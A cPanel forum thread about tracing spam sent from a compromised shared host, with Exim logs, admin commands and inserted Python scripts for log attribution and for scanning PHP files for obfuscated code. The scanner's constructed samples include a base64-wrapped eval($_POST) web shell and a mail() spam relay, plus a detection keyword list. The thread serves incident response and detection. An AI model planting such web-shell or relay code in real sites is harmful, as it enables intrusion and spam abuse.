The Community Forums

Interact with an entire community of cPanel & WHM users!

Anyone can please explain Mail Control Data?

Discussion in 'E-mail Discussions' started by postcd, Aug 14, 2016.

  1. postcd

    postcd Well-Known Member

    Joined:
    Oct 22, 2010
    Messages:
    621
    Likes Received:
    6
    Trophy Points:
    18
    Hello,

    In the WHM Mail Queue I see a spammer is sending out e-mails from multiple cPanel accounts:
    info@account1.com
    info@account2.com
    It is always info@, and sometimes such a mailbox does not exist.

    Can you please help explain what the following data, which I got when clicking a queued e-mail in WHM, means?

    Mail Control Data:

    mailnull 47 12

    <info@mydomainhere.com>
    1471148307 0
    -helo_name mydomainhere.com
    -host_address ::1.42812
    -interface_address ::1.25
    -received_protocol esmtp
    -aclc _authenticated_local_user 8
    cpanelaccountnamewhichisnotrelatedtothe_mydomainhere.com_cpanel
    -body_linecount 32
    -max_received_linelength 76
    -host_lookup_failed
    XX
    1

    recipientaccounthere@aol.com


    Received:

    from [::1] (port=42812 helo=mydomainhere.com)
    by myservhost.name.here with esmtp (Exim 4.87)
    (envelope-from <info@mydomainhere.com>)
    id 1bYmsV-0008LO-8y
    for recipientaccounthere@aol.com; Sun, 14 Aug 2016 04:18:27 +0000

    X-mailer: Mailer v1.0

    ---------

    It would be greatly helpful if anyone can explain
    a) what this e-mail means
    b) what the highlighted phrases I found interesting mean
    Especially, I found it interesting that the cPanel account "cpanelaccountnamewhichisnotrelatedtothe_mydomainhere.com_cpanel" knows about neighbour domains. Probably some spammer injected a malicious script or is abusing a flaw in that single cPanel account, then found domains on the same server IP and is trying to send out spam faking the sender e-mail addresses? Can such an e-mail be delivered when sent from a different cPanel account than the sender e-mail domain's? How can I prevent such e-mails from being processed by Exim and sent out?

    Thank you a lot
     
  2. cPanelMichael

    cPanelMichael Forums Analyst
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    30,723
    Likes Received:
    660
    Trophy Points:
    113
    cPanel Access Level:
    Root Administrator
    Hello,

    Could you search for one of the messages in /var/log/exim_mainlog and let us know the output? You can use a command such as:

    Code:
    exigrep info@domain /var/log/exim_mainlog
    Thank you.
     
  3. Luis Casagrande

    Luis Casagrande Registered

    Joined:
    Aug 19, 2016
    Messages:
    3
    Likes Received:
    1
    Trophy Points:
    1
    Location:
    Italy
    cPanel Access Level:
    DataCenter Provider
    Hi,

    we have the same issue on multiple domains.

    Outgoing mail originated from localhost with sender info@somedomain.com for somerecipient@aol.com (in most cases the recipient domain is aol, but not always).

    We already tried to analyze the exim_mainlog and access_log of these domains but we didn't find any clue. We also ran various scans with maldet and rkhunter.

    Is there anything else we can search for?

    Thanks
     
  4. cPanelMichael

    cPanelMichael Forums Analyst
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    30,723
    Likes Received:
    660
    Trophy Points:
    113
    cPanel Access Level:
    Root Administrator
    Could you provide an example of one of the entries in /var/log/exim_mainlog?

    Thank you.
     
  5. Luis Casagrande

    Luis Casagrande Registered

    Joined:
    Aug 19, 2016
    Messages:
    3
    Likes Received:
    1
    Trophy Points:
    1
    Location:
    Italy
    cPanel Access Level:
    DataCenter Provider
    Hi,

    below you can find an example:
    Code:
    2016-08-20 14:17:50 [23807] 1bb5Di-0006Bz-Ht H=(someclientdomain.com) [127.0.0.1]:38007 I=[127.0.0.1]:25 Warning: Message has been scanned: no virus or other harmful content was found
    2016-08-20 14:17:50 [23807] 1bb5Di-0006Bz-Ht <= info@someclientdomain.com H=(someclientdomain.com) [127.0.0.1]:38007 I=[127.0.0.1]:25 P=esmtp S=1717 M8S=0 id=1476252299.7533613.1471695471308@someclientdomain.com T="RE: hi somerecipient" from <info@someclientdomain.com> for somerecipient@aol.com
    2016-08-20 14:17:50 [23820] cwd=/var/spool/exim 3 args: /usr/sbin/exim -Mc 1bb5Di-0006Bz-Ht
    2016-08-20 14:17:50 [23820] 1bb5Di-0006Bz-Ht SMTP connection identification H= A=127.0.0.1 P=38007 M=1bb5Di-0006Bz-Ht U=nobody ID=99 S=nobody B=authenticated_local_user
    2016-08-20 14:17:53 [23820] 1bb5Di-0006Bz-Ht => somerecipient@aol.com F=<info@someclientdomain.com> P=<info@someclientdomain.com> R=dkim_lookuphost T=dkim_remote_smtp S=2248 H=mailin-03.mx.aol.com [152.163.0.67]:25 I=[185.78.64.20]:50166 X=TLSv1:DHE-RSA-AES256-SHA:256 CV=yes DN="/C=US/ST=Virginia/L=Dulles/O=AOL Inc./OU=AOL Mail/CN=mx.aol.com" C="250 2.0.0 Ok: queued as 91EE0700000AC" QT=3s DT=3s
    2016-08-20 14:17:53 [23820] 1bb5Di-0006Bz-Ht Completed QT=3s
    
     
    #5 Luis Casagrande, Aug 20, 2016
    Last edited by a moderator: Aug 20, 2016
  6. Ameya Barwe

    Ameya Barwe Well-Known Member

    Joined:
    Jan 1, 2016
    Messages:
    49
    Likes Received:
    2
    Trophy Points:
    8
    Location:
    Nashik
    cPanel Access Level:
    Root Administrator
    I think these emails are being sent from a PHP script and not from an email account. I recommend you check the access log file of that someclientdomain.com domain name for the presence of a malicious file; it is at this path:
    /home/cPanel_User/access_logs/someclientdomain.com
     
  7. cPanelMichael

    cPanelMichael Forums Analyst
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    30,723
    Likes Received:
    660
    Trophy Points:
    113
    cPanel Access Level:
    Root Administrator
    This suggests the email is coming from a script. Try using a command like this to look for directories that have sent out high numbers of emails:

    Code:
    grep cwd /var/log/exim_mainlog | grep -v /var/spool | awk -F"cwd=" '{print $2}' | awk '{print $1}' | sort | uniq -c | sort -n
    
    Thank you.
     
  8. postcd

    postcd Well-Known Member

    Joined:
    Oct 22, 2010
    Messages:
    621
    Likes Received:
    6
    Trophy Points:
    18
    Hello, take a look please:

    What do you think please?

    When looking up access logs for "somecpaneluserhere", matching 07:** time today:
    Code:
    grep -Ril "27/Aug/2016:07:3" /home/somecpaneluserhere/access_logs/
    cat /home/somecpaneluserhere/access_logs/* | grep "27/Aug/2016:07:3"

    I can see:
    Code:
    79.6.173.* - - [27/Aug/2016:07:33:04 +0000] "GET /wp-login.php HTTP/1.1" 404 14 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"
    199.201.90.* - - [27/Aug/2016:07:12:25 +0000] "POST /forum/Themes/default/languages/Login.albanian.php HTTP/1.1" 200 840 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0"
    67.211.37.* - - [27/Aug/2016:07:18:41 +0000] "POST /wp-includes/js/swfupload/plugins/css.php HTTP/1.1" 200 361 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0"

    The second and third files were infected by 2 bad lines of (encoded) code, so I removed the bad lines.

    I tried this, and neither the "somecpaneluserhere" nor the "locallyhosteddomain.com" cPanel account was listed among the paths sending the most e-mail. Does it mean someone knows the password to my somecpaneluserhere cPanel account, or is some script within that somecpaneluserhere cPanel account sending out spam? I changed that account's password not long ago and used an unguessable long password.
     
    #8 postcd, Aug 27, 2016
    Last edited: Aug 27, 2016
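Why the cwd pipeline from post #7 came up empty for postcd in post #8 (and for Luis), shown as an added example that is not code from the thread or from cPanel; the log lines are constructed and the account names shop2 and webshop1 are invented. Exim writes a cwd= line only when some process executes the sendmail/exim binary. Luis's message was handed to Exim over SMTP on 127.0.0.1 (P=esmtp, HELO set to the victim's domain), so its only cwd= line belongs to the delivery process in /var/spool/exim, which the pipeline deliberately drops. What survives for that path is cPanel's "SMTP connection identification" line, whose U= is the Unix user cPanel attributed the local socket to; U=nobody means the script ran as the web server's user and the log alone cannot name the account, which is the case the later posts solve with a file search.

```python
"""Attribute outbound mail in /var/log/exim_mainlog to the local account that
injected it. Added example; the log lines below are constructed, not a real log."""
import re
from collections import Counter

MSG_ID = r"[0-9A-Za-z]{6}-[0-9A-Za-z]{6}-[0-9A-Za-z]{2}"
CWD_RE = re.compile(r" cwd=(?P<cwd>\S+) \d+ args: (?P<args>.*)$")
ARRIVAL_RE = re.compile(rf" (?P<id>{MSG_ID}) <= (?P<sender>\S+)(?P<rest>.*)$")
IDENT_RE = re.compile(
    rf" (?P<id>{MSG_ID}) SMTP connection identification .*?\bU=(?P<user>\S+).*?\bB=(?P<how>\S+)"
)

# Constructed sample: one SMTP injection by a script running as 'nobody' (modelled on the
# log posted above), two sendmail-binary injections from a directory under /home/shop2,
# and one SMTP injection attributed to the account 'webshop1'. Names are invented.
SAMPLE_LOG = """\
2016-08-20 14:17:50 [23807] 1bb5Di-0006Bz-Ht <= info@someclientdomain.com H=(someclientdomain.com) [127.0.0.1]:38007 I=[127.0.0.1]:25 P=esmtp S=1717 for somerecipient@aol.com
2016-08-20 14:17:50 [23820] cwd=/var/spool/exim 3 args: /usr/sbin/exim -Mc 1bb5Di-0006Bz-Ht
2016-08-20 14:17:50 [23820] 1bb5Di-0006Bz-Ht SMTP connection identification H= A=127.0.0.1 P=38007 M=1bb5Di-0006Bz-Ht U=nobody ID=99 S=nobody B=authenticated_local_user
2016-08-20 14:20:01 [23901] cwd=/home/shop2/public_html/wp-content/uploads 3 args: /usr/sbin/sendmail -t -i
2016-08-20 14:20:01 [23901] 1bb5G3-0006Cz-Aa <= info@otherdomain.com U=shop2 P=local S=1402 for victim@aol.com
2016-08-20 14:20:03 [23905] cwd=/home/shop2/public_html/wp-content/uploads 3 args: /usr/sbin/sendmail -t -i
2016-08-20 14:25:10 [24011] 1bb5L2-0006Dz-Bb SMTP connection identification H= A=127.0.0.1 P=38120 M=1bb5L2-0006Dz-Bb U=webshop1 ID=1012 S=webshop1 B=authenticated_local_user
2016-08-20 14:25:10 [24011] 1bb5L2-0006Dz-Bb <= info@thirddomain.com H=(thirddomain.com) [127.0.0.1]:38120 I=[127.0.0.1]:25 P=esmtp S=1650 for victim2@aol.com
""".splitlines()


def count_sendmail_cwd(lines):
    """Same idea as the grep|awk pipeline: count the working directory of every
    process that ran sendmail/exim directly. Exim's own delivery processes log
    cwd=/var/spool/exim, hence the exclusion; SMTP-injected mail never appears here."""
    counts = Counter()
    for line in lines:
        m = CWD_RE.search(line)
        if m and not m["cwd"].startswith("/var/spool"):
            counts[m["cwd"]] += 1
    return counts


def local_smtp_messages(lines):
    """Messages a script injected over SMTP to 127.0.0.1 carry no cwd line. Join
    cPanel's 'SMTP connection identification' line (U= local user) to the '<='
    arrival line (sender, recipient) on the Exim message id."""
    ident, arrivals = {}, {}
    for line in lines:
        m = IDENT_RE.search(line)
        if m:
            ident[m["id"]] = {"user": m["user"], "how": m["how"]}
            continue
        m = ARRIVAL_RE.search(line)
        if m:
            rcpt = re.search(r" for (\S+)\s*$", m["rest"])
            arrivals[m["id"]] = {"sender": m["sender"], "recipient": rcpt.group(1) if rcpt else None}
    return [{"id": mid, **ident[mid], **fields} for mid, fields in arrivals.items() if mid in ident]


def senders_by_account(lines):
    """Per-user volume of SMTP-injected mail. 'nobody' means the web server ran the
    script as itself, so the log cannot name the cPanel account; fall back to the
    access logs and a file search, as the thread goes on to do."""
    return Counter(m["user"] for m in local_smtp_messages(lines))


if __name__ == "__main__":
    print("sendmail cwd counts:", dict(count_sendmail_cwd(SAMPLE_LOG)))
    for m in local_smtp_messages(SAMPLE_LOG):
        print(m)
    print("SMTP injections per local user:", dict(senders_by_account(SAMPLE_LOG)))
```

Run it against the real file with `local_smtp_messages(open("/var/log/exim_mainlog"))`; the functions only need an iterable of lines. The shop2 sendmail injections show up in the cwd count and nowhere else, the two SMTP injections show up only in the identification join, so both views are needed to see everything a server is sending.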
  9. Luis Casagrande

    Luis Casagrande Registered

    Joined:
    Aug 19, 2016
    Messages:
    3
    Likes Received:
    1
    Trophy Points:
    1
    Location:
    Italy
    cPanel Access Level:
    DataCenter Provider
    Hi,

    we did find the source of the spam email. It wasn't in any of the accounts that were "sending" the mail (info@somedomain.com) and that I can find with the following command.

    Code:
    grep cwd /var/log/exim_mainlog | grep -v /var/spool | awk -F"cwd=" '{print $2}' | awk '{print $1}' | sort | uniq -c | sort -n

    It was in another account that wasn't sending email itself but was used to send email as other users' domains on the same machine. So do not limit the search for the malicious script to the account that is actually sending the email.

    We did find it by searching all PHP scripts containing eval and searching for potentially malicious code in base64. We also cross-referenced the time of the email being sent with the access_log of the suspected compromised account that we found with the eval search.

    I hope this can help you.
     
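The eval/base64 search Luis describes, as an added example in Python rather than grep (not the thread's or cPanel's code). The three PHP files are constructed: two carry payloads wrapped the way real droppers wrap them (base64, and base64 over raw deflate for PHP's gzinflate()), the third is clean. The scanner counts the telltale functions in the source, peels the encoded literal until PHP appears, and counts again, so a file whose only visible sin is one eval() is ranked by what it actually hides. The paths under /home/shop2 are invented.

```python
"""Rank PHP files by the obfuscation they carry and show what the payload does.
Added example; the three files are constructed, not taken from a real host."""
import base64
import binascii
import re
import zlib

# PHP functions and superglobals that dropped mailers lean on.
SUSPICIOUS = [re.compile(p) for p in (
    r"\beval\s*\(", r"\bassert\s*\(", r"\bcreate_function\s*\(",
    r"\bbase64_decode\s*\(", r"\bgzinflate\s*\(", r"\bgzuncompress\s*\(", r"\bstr_rot13\s*\(",
    r"\bmail\s*\(", r"\$_(?:POST|GET|REQUEST|COOKIE)\[",
)]
# A quoted run of base64 alphabet long enough to be a payload rather than a token.
LITERAL_RE = re.compile(r"""['"]([A-Za-z0-9+/]{16,}={0,2})['"]""")


def _raw_deflate(data):
    """PHP's gzinflate() reads raw deflate, i.e. zlib with no header (wbits=-15)."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()


_STAGE1 = b"eval($_POST['code']);"
_STAGE2 = b"mail($_POST['to'], $_POST['subj'], $_POST['msg'], 'From: info@' . $_SERVER['HTTP_HOST']);"

# Constructed sample files (invented paths; payloads built above so they decode cleanly).
SAMPLE_FILES = {
    "/home/shop2/public_html/wp-includes/js/swfupload/plugins/css.php":
        '<?php $a="%s"; eval(base64_decode($a)); ?>' % base64.b64encode(_STAGE1).decode(),
    "/home/shop2/public_html/forum/Themes/default/languages/Login.albanian.php":
        "<?php @eval(gzinflate(base64_decode('%s')));" % base64.b64encode(_raw_deflate(_STAGE2)).decode(),
    "/home/shop2/public_html/wp-content/themes/shop/functions.php":
        "<?php function shop_setup() { add_theme_support('title-tag'); }",
}


def count_hits(text):
    return sum(len(p.findall(text)) for p in SUSPICIOUS)


def _looks_like_php(data):
    printable = all(32 <= b < 127 or b in (9, 10, 13) for b in data)
    return printable and (b"$" in data or b"(" in data)


def peel(blob, max_layers=6):
    """Undo base64 / raw-deflate wrapping until PHP source appears. Returns the
    (layer name, bytes) steps applied; an empty list means nothing decoded."""
    layers, cur = [], blob
    for _ in range(max_layers):
        if _looks_like_php(cur):
            break
        try:
            step = ("base64", base64.b64decode(cur, validate=True))
        except (binascii.Error, ValueError):
            try:
                step = ("gzinflate", zlib.decompress(cur, -15))
            except zlib.error:
                break
        if not step[1]:
            break
        layers.append(step)
        cur = step[1]
    return layers


def scan_source(path, src):
    """Score = suspicious calls visible in the file + those inside its decoded payloads."""
    decoded, payload_hits = [], 0
    for literal in LITERAL_RE.findall(src):
        layers = peel(literal.encode())
        if layers:
            text = layers[-1][1].decode("latin-1")
            decoded.append({"layers": [name for name, _ in layers], "text": text})
            payload_hits += count_hits(text)
    visible = count_hits(src)
    return {"path": path, "score": visible + payload_hits, "visible_hits": visible, "decoded": decoded}


def scan_files(files):
    """files: {path: source}. Worst first, so the top of the list is where to look."""
    return sorted((scan_source(p, s) for p, s in files.items()), key=lambda r: r["score"], reverse=True)


if __name__ == "__main__":
    for r in scan_files(SAMPLE_FILES):
        print(r["score"], r["path"])
        for d in r["decoded"]:
            print("   ", " -> ".join(d["layers"]), ":", d["text"])
```

To run it over an account, build the dict from `pathlib.Path("/home/ACCOUNT/public_html").rglob("*.php")` reading each file with `errors="replace"`. Note that the decoded second payload is a bare `mail($_POST[...])` relay with the From: address taken from the request's Host header, which is exactly how one compromised account ends up sending as info@ of every neighbouring domain.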
  10. cPanelMichael

    cPanelMichael Forums Analyst
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    30,723
    Likes Received:
    660
    Trophy Points:
    113
    cPanel Access Level:
    Root Administrator
    To answer your earlier question, yes, this suggests the email originates from that account. The steps you completed (changing the account password and removing the infected lines from those files) should address the issue. You may also want to search the term "secure wordpress" on our forums to see examples of how other users have secured their server to help prevent these types of attacks.

    Thank you.
     
  11. postcd

    postcd Well-Known Member

    Joined:
    Oct 22, 2010
    Messages:
    621
    Likes Received:
    6
    Trophy Points:
    18
    As I can't update my earlier posts, I will add this one.

    I think a good way to find spam scripts (these were not detected by:
    Code:
    grep cwd /var/log/exim_mainlog | grep -v /var/spool | awk -F"cwd=" '{print $2}' | awk '{print $1}' | sort | uniq -c | sort -n
    )

    is to click the spam e-mail in the WHM e-mail queue or find the spam log entry in exim_mainlog.

    When looking up the Mail Control Data section in WHM E-mail Queue/message, I saw:
    Code:
    -aclc _authenticated_local_user 8
    infectedcpanelhere

    In exim_mainlog I saw:
    Code:
    (actual_sender=[somecpaneluserhere@host.domainhere.com])

    So it identifies the infected cPanel account. Then look up the first time that message appeared in the queue; in WHM/MailQueue/Message I have, for example:
    Code:
    Date: Mon, 12 Sep 2016 08:27:04 +0000 (UTC)
    So I copy the hour and tens of minutes, "08:2", and then cat the access log for that cPanel account, like:
    Code:
    cat /usr/local/apache/domlogs/cpanelnamehere/* | grep ".php" | grep -vE "404|gif|jpg|png|robots.txt" | grep -E "08:2"
    Then view the files accessed around that time, and if some bad script or injected malicious code is found, look up the whole cPanel account for footprints of the malicious code:
    Code:
    grep -Ril "bad phrase" /home/cpanelnamehere/public_html
    and for files that were modified on the same day as this one:
    Code:
    find /home -path /home/virtfs -prune -o -type f -name "*.php" -newermt 2014-11-05 ! -newermt 2014-11-07 -print
    That finds files modified on 2014-11-06.
     
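The procedure in the last post, together with the "Mail Control Data" the first post asked about, as an added example that is not the thread's or cPanel's code. WHM is showing the Exim spool -H file for the queued message: the first number on the third line is the arrival time as a Unix epoch (1471148307 is 2016-08-14 04:18:27 UTC, matching the Received: header), and "-aclc _authenticated_local_user 8" announces that the ACL connection variable acl_c_authenticated_local_user follows on the next line, eight bytes long; the leading underscore is just how Exim writes the name. The control data below is constructed from the thread's sample with the account shortened to an assumed eight-byte "webshop1", and the access-log lines are constructed too. The parser then selects .php requests around the arrival time, which replaces the "HH:M" prefix grep and its blind spot when a send straddles a ten-minute boundary.

```python
"""Parse WHM's 'Mail Control Data' (the Exim spool -H file) for a queued message,
recover the local account and arrival time, then pull the web requests that hit
that account around the same moment. Added example; all data is constructed."""
import re
from datetime import datetime, timedelta, timezone

# Constructed from the thread's sample; 'webshop1' is an assumed account name whose
# 8 bytes match the length on the -aclc line.
CONTROL_DATA = """\
mailnull 47 12
<info@mydomainhere.com>
1471148307 0
-helo_name mydomainhere.com
-host_address ::1.42812
-interface_address ::1.25
-received_protocol esmtp
-aclc _authenticated_local_user 8
webshop1
-body_linecount 32
-max_received_linelength 76
-host_lookup_failed
XX
1
recipientaccounthere@aol.com
"""


def parse_control_data(text):
    """Layout: [msgid-H], uid/gid, envelope sender, '<epoch> <warnings>', '-option'
    lines, non-recipient tree ('XX' = none), recipient count, recipients.
    '-aclc NAME LEN' / '-aclm NAME LEN' are followed by LEN bytes of value, which may
    span lines, so the length is authoritative. WHM omits the leading msgid line."""
    lines = text.splitlines()
    if lines[0].endswith("-H"):
        lines = lines[1:]
    info = {"sender": lines[1].strip("<>"), "received": int(lines[2].split()[0]),
            "options": {}, "acl_vars": {}, "recipients": []}
    i = 3
    while i < len(lines) and lines[i].startswith("-"):
        parts = lines[i].split()
        key = parts[0][1:]
        if key in ("aclc", "aclm"):
            name, length = parts[1], int(parts[2])
            value = "\n".join(lines[i + 1:])[:length]
            info["acl_vars"]["acl_" + key[-1] + name] = value   # acl_c_authenticated_local_user
            i += 2 + value.count("\n")
        else:
            info["options"][key] = " ".join(parts[1:]) if len(parts) > 1 else True
            i += 1
    count = int(lines[i + 1])                       # skip the tree line, read the count
    info["recipients"] = lines[i + 2:i + 2 + count]
    return info


def split_host_port(value):
    """'::1.42812' -> ('::1', 42812): this Exim version appends the port after a dot."""
    host, _, port = value.rpartition(".")
    return host, int(port)


def summarize(info):
    host, port = split_host_port(info["options"]["host_address"])
    return {"account": info["acl_vars"].get("acl_c_authenticated_local_user"),
            "received_utc": datetime.fromtimestamp(info["received"], tz=timezone.utc).isoformat(),
            "sender": info["sender"], "helo": info["options"].get("helo_name"),
            "client": f"{host} port {port}", "recipients": info["recipients"]}


# Constructed Apache domlog lines for that account (RFC 5737 test addresses).
ACCESS_LOG = """\
192.0.2.10 - - [14/Aug/2016:04:12:51 +0000] "GET /wp-login.php HTTP/1.1" 404 14 "-" "Mozilla/5.0"
198.51.100.4 - - [14/Aug/2016:04:15:00 +0000] "GET /index.php HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
203.0.113.7 - - [14/Aug/2016:04:18:25 +0000] "POST /wp-includes/js/swfupload/plugins/css.php HTTP/1.1" 200 361 "-" "Mozilla/5.0"
198.51.100.4 - - [14/Aug/2016:04:18:26 +0000] "GET /images/logo.png HTTP/1.1" 200 4023 "-" "Mozilla/5.0"
198.51.100.4 - - [14/Aug/2016:05:40:02 +0000] "POST /contact.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
""".splitlines()

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')


def requests_near(log_lines, received_epoch, window_minutes=10):
    """Successful .php requests within +/- window of the message's arrival, the
    same filter as the grep chain but keyed on the exact timestamp. POSTs first:
    a POST to a file that was never a real endpoint is the usual trigger."""
    centre = datetime.fromtimestamp(received_epoch, tz=timezone.utc)
    window = timedelta(minutes=window_minutes)
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        if abs(ts - centre) > window or m["status"] == "404":
            continue
        if not m["path"].split("?")[0].endswith(".php"):
            continue
        hits.append({"ts": ts.isoformat(), "ip": m["ip"], "method": m["method"],
                     "path": m["path"], "status": m["status"]})
    hits.sort(key=lambda h: (h["method"] != "POST", h["ts"]))
    return hits


if __name__ == "__main__":
    info = parse_control_data(CONTROL_DATA)
    print(summarize(info))
    for h in requests_near(ACCESS_LOG, info["received"]):
        print(h)
```

On a live server the same bytes are in /var/spool/exim/input/<id>-H (WHM reads that file), and the domlog for the account named by acl_c_authenticated_local_user lives under /usr/local/apache/domlogs/; the POST that lands a few seconds before the arrival time is the file to open first, and its path is the string to grep the rest of /home for.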